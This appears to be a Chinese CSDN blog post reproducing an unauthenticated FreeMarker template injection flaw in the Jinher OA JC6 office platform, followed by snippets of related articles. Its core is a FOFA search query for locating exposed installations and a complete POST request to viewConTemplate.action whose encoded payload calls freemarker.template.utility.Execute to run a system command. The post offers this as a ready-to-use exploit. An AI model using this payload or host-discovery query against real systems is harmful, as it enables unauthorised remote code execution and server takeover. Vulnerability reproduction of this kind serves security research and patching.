【漏洞复现】金和OA jc6 viewConTemplate.action FreeMarker模板注入漏洞

最新推荐文章于 2024-06-19 15:41:14 发布
最新推荐文章于 2024-06-19 15:41:14 发布
阅读量713 收藏
点赞数 14
分类专栏: 漏洞复现 文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67810151/article/details/136723099
版权
本文介绍了金和数字化智能办公平台(JC6)中viewConTemplate.action接口存在的FreeMarker模板注入漏洞,详细阐述了漏洞概述、复现过程及影响范围。未授权的攻击者可能利用此漏洞进行远程代码执行。
摘要由CSDN通过智能技术生成

0x01 产品简介

金和数字化智能办公平台(简称JC6)是一款结合了人工智能技术的数字化办公平台,为企业带来了智能化的办公体验和全面的数字化转型支持。同时符合国家信创认证标准,支持组织数字化转型,实现业务流程的数字化、智能化和协同化,提高企业竞争力。

0x02 漏洞概述

金和OA viewConTemplate.action接口存在FreeMarker模板注入漏洞,未授权的攻击者可以通过该漏洞远程执行代码。

0x03 测绘语句

fofa: app="金和网络-金和OA"

0x04 漏洞复现


POST /jc6/platform/portalwb/portalwb-con-template!viewConTemplate.action HTTP/1.1

Host:

Content-Type: application/x-www-form-urlencoded



moduId=1&code=%253Cclob%253E%2524%257B%2522freemarker.template.utility.Execute%2522%253Fnew%28%29%28%2522ipconfig%2522%29
了解本专栏 订阅专栏 解锁全文 超级会员免费看
从不学安全
关注
  • 14
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
OA jc6 viewConTemplate.action RCE漏洞复现
0xSec
03-13 533
OA jc6 portalwb-con-template!viewConTemplate.action接口存在FreeMarker模板注入漏洞,未经身份验证的攻击者可以利用此漏洞远程代码执行、写入后门文件,导致服务器存在被控的风险。
漏洞复现】​OA-viewConTemplate.action-远程命令执行漏洞
Nday_Seeker
03-21 407
OA viewConTemplate.action存在远程命令执行漏洞。攻击者可能通过精心构造的输入数据,在未经适当授权的情况下执行任意恶意代码指令。
Freemarker中如何避免xss漏洞
he_qiao_2010的专栏
06-20 3338
什么是XSS漏洞 试想一下,如果我们开发一个订单系统,订单名称如果没有做限制,允许用户输入任意字符,那么就有产生XSS的危险。攻击者可以很容易编写一个恶意JS脚本,然后将当前登录用户的cookie或者其他敏感信息抓取到,发送给攻击者自己,这就是XSS(跨站脚本)攻击。如何解决这个问题,首先我们想到的是在用户输入订单的时候,我们对订单名称做限制,不允许输入特殊字符。这样是可以避免的,不过对于一个大的...
OA jc6 viewConTemplate.action存在FreeMarker模板注入漏洞
最新发布
zkaqlaoniao的博客
06-19 217
OA-jc6-viewConTemplate.action接口存在FreeMarker模板注入漏洞,未经身份验证的攻击者可以利用此漏洞远程代码执行、写入后门文件,导致服务器存在被控的风险。申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。帮助你在面试中脱颖而出。
修复 Freemarker 模板注入漏洞
kylerduane的博客
08-24 1081
解决Freemarker 模板注入漏洞.,故可以使用我们自己定义的。
从ofcms的模板注入漏洞(CVE-2019-9614)浅析SSTI漏洞
Alexz__的博客
05-04 1717
什么是SSTI漏洞 CVE-2019-9614漏洞复现 ofcms的freemarker模板源码简要分析 壹 什么是SSTI漏洞 SSTI:Server Side Template Injection 服务器端模板注入漏洞 既然是注入漏洞,那么它所运用的核心思想就和XSSSQL注入差不多,都是运用不安全的用户输入,将正常的数据接收处进行恶意输入,导致服务器将用户输入数据当成代码并执行,从而完成一些危险的行为 我们针对SSTI来看,他的主要载体是web站点MVC架构之上,也就是从...
freemarker采坑
Chandler的博客
08-05 339
option/aOption..但凡含有option的都会被当做是freemarker的关键字:如果model传入的对象中含有这个字段,不管对应字段是否有值,都会报异常。
Freemarker模板注入:CVE-2020-7477
守拙的博客
08-04 2306
一、漏洞名称: FusionAuth存在Freemarker模板注入导致远程命令执行 二、漏洞编号: CVE-2020-7477 三、漏洞描述: 在FusionAuth 1.11.0之前版本存在注入漏洞,经过身份验证的用户被允许编辑电子邮件模板或主题, 远程攻击者可利用该漏洞调用在系统上执行任意命令。 四、影响版本: FusionAuth <= 1.11.0 五、漏洞分析 通过对直接编辑freemarker模板,调用freemarker.template.utility.E
1day漏洞包含POC-OA jc6 viewConTemplate.action存在FreeMarker模板注入漏洞
weixin_43167326的博客
03-18 644
和JCS协同管理应用软件采用了精确管理模型的最新指导思路,充分融入现代企业的管理科学精髓,通过结合最新的信息化技术,从而更高效的帮助客户开展业务、管理企业,提高效率。JCS除了显著的“集团化应用”的特色外,还具有灵活易用的“信息门户应用”功能,可以根据个人需求,定制灵活的个性化工作台,全面体现了和JCS以人为本、管理精确的理念。其接口存在命令执行漏洞,可能导致服务器被攻击者接管。
漏洞复现-OA系列
aming小老弟
03-14 1076
|| banner=“Path=/jc6OA协同办公管理系统C6软件(简称OA),本着简单、适用、高效的原则,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。app=“网络-OA”||body=“/jc6/platform/sys/login”请联系厂家 http://www.jinher.com/升级。
OA 数据字典 c6
09-06
OA系统,C6数据库-数据字典,分享以供大家参考,借鉴
java代码审计.Freemarker模板命令注入.分析
10-21
然而,在 OFCMS 1.1.2 版本中,开发者未对网站后台的“模板文件”功能处的“所存储的模板数据”做好过滤,导致攻击者可以使用 Freemarker 模板注入的方式获取 WebShell。 漏洞细节 该漏洞存在于 OFCMS 1.1.2 的...
Java FreeMarker模板引擎注入深入分析
蚁景网安学院
11-22 1265
最近和 F1or 大师傅一起挖洞的时候发现一处某 CMS SSTI 的 0day,之前自己在复现 jpress 的一些漏洞的时候也发现了 SSTI 这个洞杀伤力之大。今天来好好系统学习一手。
OA_jc6_viewConTemplate.action存在FreeMarker模板注入漏洞
qq_36334672的博客
03-30 177
OA-jc6-viewConTemplate.action接口存在FreeMarker模板注入漏洞,未经身份验证的攻击者可以利用此漏洞远程代码执行、写入后门文件,导致服务器存在被控的风险。
漏洞通知】JeecgBoot 修复 Freemarker 模板注入漏洞漏洞危害等级:高危
JEECG官方博客
08-15 6253
漏洞通知】JeecgBoot 修复Freemarker模板注入漏洞漏洞危害等级:高危
JeecgBoot3.5漏洞升级—快速文档
JEECG官方博客
11-24 1089
近几年来,黑客攻击行为呈现出日益复杂和隐蔽的趋势,对个人和组织的安全造成了严重威胁。黑客们不断寻找新的漏洞安全漏洞,利用各种手段进行网络攻击,包括恶意软件、网络钓鱼、勒索软件等。因此,我们每个人都需要关注漏洞风险,加强网络安全意识,及时更新系统补丁。目前有网友反馈受到攻击勒索,虽然我们的商业客户并没受到影响,但也请尽快升级补丁,避免未知的风险
Java安全之freemaker模版注入
AS011x的博客
09-19 1799
FreeMarker 是一款模板引擎: 即一种基于模板和要改变的数据, 并用来生成输出文本(HTML网页,电子邮件,配置文件,源代码等)的通用工具。在线手册:什么是 FreeMarker?- FreeMarker 中文官方参考手册模板文件存放在Web服务器上,当访问指定模版文件时, FreeMarker会动态转换模板,用最新的数据内容替换模板中${...}的部分,然后返回渲染结果。${...}: FreeMarker将会输出真实的值来替换大括号内的表达式,这样的表达式被称为(插值)
OFCMS Freemarker模板命令注入漏洞深度分析
文档指出在系统中,由于对Freemarker模板数据的过滤不足,攻击者可能利用模板注入执行系统命令,获取WebShell。" 在Java代码审计中,Freemarker模板命令注入是一个严重的问题,尤其当系统未对用户提供的模板数据...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

从不学安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值